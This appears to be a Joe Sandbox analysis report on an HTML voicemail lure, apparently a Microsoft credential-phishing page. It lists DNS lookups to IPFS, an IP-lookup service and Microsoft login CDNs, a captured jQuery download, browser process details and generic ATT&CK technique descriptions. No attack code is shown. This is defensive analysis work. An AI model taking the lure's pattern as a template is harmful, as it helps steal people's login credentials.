Mar 13, 2025 11:20:19.067452908 CET	53	53635	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:26.827375889 CET	53	62850	1.1.1.1	192.168.2.17
Mar 13, 2025 11:20:45.714504957 CET	53	62327	1.1.1.1	192.168.2.17
Mar 13, 2025 11:21:01.812228918 CET	138	138	192.168.2.17	192.168.2.255
Mar 13, 2025 11:21:06.139770031 CET	53	54646	1.1.1.1	192.168.2.17
Mar 13, 2025 11:21:08.167386055 CET	53	60974	1.1.1.1	192.168.2.17
Mar 13, 2025 11:21:11.609736919 CET	53	64425	1.1.1.1	192.168.2.17
Mar 13, 2025 11:21:39.106074095 CET	53	59532	1.1.1.1	192.168.2.17

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 13, 2025 11:20:06.256119967 CET	192.168.2.17	1.1.1.1	0x15fb	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:06.256278038 CET	192.168.2.17	1.1.1.1	0x7adc	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Mar 13, 2025 11:20:09.563134909 CET	192.168.2.17	1.1.1.1	0x82ca	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:09.563514948 CET	192.168.2.17	1.1.1.1	0x7adb	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Mar 13, 2025 11:20:10.891587019 CET	192.168.2.17	1.1.1.1	0x6103	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:10.891726017 CET	192.168.2.17	1.1.1.1	0xe1be	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 13, 2025 11:20:14.428576946 CET	192.168.2.17	1.1.1.1	0x2b41	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.428862095 CET	192.168.2.17	1.1.1.1	0x4953	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Mar 13, 2025 11:20:14.432472944 CET	192.168.2.17	1.1.1.1	0x94f7	Standard query (0)	ipfs.io	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.432739973 CET	192.168.2.17	1.1.1.1	0xa0d7	Standard query (0)	ipfs.io	65	IN (0x0001)	false
Mar 13, 2025 11:20:14.906570911 CET	192.168.2.17	1.1.1.1	0x66e9	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.906804085 CET	192.168.2.17	1.1.1.1	0xd08	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 13, 2025 11:20:18.973272085 CET	192.168.2.17	1.1.1.1	0xe84f	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:18.973665953 CET	192.168.2.17	1.1.1.1	0x6b81	Standard query (0)	api.ipify.org	65	IN (0x0001)	false
Mar 13, 2025 11:20:19.059570074 CET	192.168.2.17	1.1.1.1	0x29f4	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:19.059895039 CET	192.168.2.17	1.1.1.1	0x3d1a	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 13, 2025 11:20:06.262924910 CET	1.1.1.1	192.168.2.17	0x15fb	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:06.262924910 CET	1.1.1.1	192.168.2.17	0x15fb	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:06.262924910 CET	1.1.1.1	192.168.2.17	0x15fb	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:06.262924910 CET	1.1.1.1	192.168.2.17	0x15fb	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:09.570013046 CET	1.1.1.1	192.168.2.17	0x82ca	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:09.570569038 CET	1.1.1.1	192.168.2.17	0x7adb	No error (0)	ipfs.io			65	IN (0x0001)	false
Mar 13, 2025 11:20:10.898478031 CET	1.1.1.1	192.168.2.17	0xe1be	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 13, 2025 11:20:10.898514032 CET	1.1.1.1	192.168.2.17	0x6103	No error (0)	www.google.com		142.250.186.36	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.437105894 CET	1.1.1.1	192.168.2.17	0x2b41	No error (0)	aadcdn.msftauth.net	www.tm.aadcdn.msftauth.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.437105894 CET	1.1.1.1	192.168.2.17	0x2b41	No error (0)	www.tm.aadcdn.msftauth.trafficmanager.net	aadcdn.msftauth.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.437105894 CET	1.1.1.1	192.168.2.17	0x2b41	No error (0)	aadcdn.msftauth.edgekey.net	e329293.dscd.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.437105894 CET	1.1.1.1	192.168.2.17	0x2b41	No error (0)	e329293.dscd.akamaiedge.net		92.123.12.9	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.437105894 CET	1.1.1.1	192.168.2.17	0x2b41	No error (0)	e329293.dscd.akamaiedge.net		92.123.12.11	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.438467026 CET	1.1.1.1	192.168.2.17	0x4953	No error (0)	aadcdn.msftauth.net	www.tm.aadcdn.msftauth.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.438467026 CET	1.1.1.1	192.168.2.17	0x4953	No error (0)	www.tm.aadcdn.msftauth.akadns.net	aadcdn.msftauth.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.438467026 CET	1.1.1.1	192.168.2.17	0x4953	No error (0)	aadcdn.msftauth.edgekey.net	e329293.dscd.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:14.441874027 CET	1.1.1.1	192.168.2.17	0xa0d7	No error (0)	ipfs.io			65	IN (0x0001)	false
Mar 13, 2025 11:20:14.441912889 CET	1.1.1.1	192.168.2.17	0x94f7	No error (0)	ipfs.io		209.94.90.1	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.914108038 CET	1.1.1.1	192.168.2.17	0x66e9	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.914108038 CET	1.1.1.1	192.168.2.17	0x66e9	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.914108038 CET	1.1.1.1	192.168.2.17	0x66e9	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:14.914429903 CET	1.1.1.1	192.168.2.17	0xd08	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 13, 2025 11:20:18.980519056 CET	1.1.1.1	192.168.2.17	0xe84f	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:18.980519056 CET	1.1.1.1	192.168.2.17	0xe84f	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:18.980519056 CET	1.1.1.1	192.168.2.17	0xe84f	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:18.980532885 CET	1.1.1.1	192.168.2.17	0x6b81	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 13, 2025 11:20:19.066637993 CET	1.1.1.1	192.168.2.17	0x3d1a	No error (0)	aadcdn.msftauth.net	www.tm.aadcdn.msftauth.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.066637993 CET	1.1.1.1	192.168.2.17	0x3d1a	No error (0)	www.tm.aadcdn.msftauth.akadns.net	aadcdn.msftauth.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.066637993 CET	1.1.1.1	192.168.2.17	0x3d1a	No error (0)	aadcdn.msftauth.edgekey.net	e329293.dscd.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.067452908 CET	1.1.1.1	192.168.2.17	0x29f4	No error (0)	aadcdn.msftauth.net	www.tm.aadcdn.msftauth.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.067452908 CET	1.1.1.1	192.168.2.17	0x29f4	No error (0)	www.tm.aadcdn.msftauth.akadns.net	aadcdn.msftauth.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.067452908 CET	1.1.1.1	192.168.2.17	0x29f4	No error (0)	aadcdn.msftauth.edgekey.net	e329293.dscd.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 13, 2025 11:20:19.067452908 CET	1.1.1.1	192.168.2.17	0x29f4	No error (0)	e329293.dscd.akamaiedge.net		92.123.12.11	A (IP address)	IN (0x0001)	false
Mar 13, 2025 11:20:19.067452908 CET	1.1.1.1	192.168.2.17	0x29f4	No error (0)	e329293.dscd.akamaiedge.net		92.123.12.9	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

code.jquery.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.17	60447	151.101.2.137	443	1456	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 10:20:08 UTC	539	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 10:20:09 UTC	612	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 13 Mar 2025 10:20:09 GMT Age: 530192 X-Served-By: cache-lga21931-LGA, cache-pdk-kpdk1780111-PDK X-Cache: HIT, HIT X-Cache-Hits: 1584, 5 X-Timer: S1741861209.159957,VS0,VE0 Vary: Accept-Encoding
2025-03-13 10:20:09 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-13 10:20:09 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-13 10:20:09 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-13 10:20:09 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-13 10:20:09 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-13 10:20:09 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Target ID:	1
Start time:	06:20:04
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\New_Voicemail_Peterborough_.html
Imagebase:	0x7ff643280000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	06:20:05
Start date:	13/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1952,i,7074487271076728629,13278226430279106264,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
Imagebase:	0x7ff643280000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New_Voicemail_Peterborough_.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 2332, Parent PID: 4280

General

Windows Analysis Report
New_Voicemail_Peterborough_.html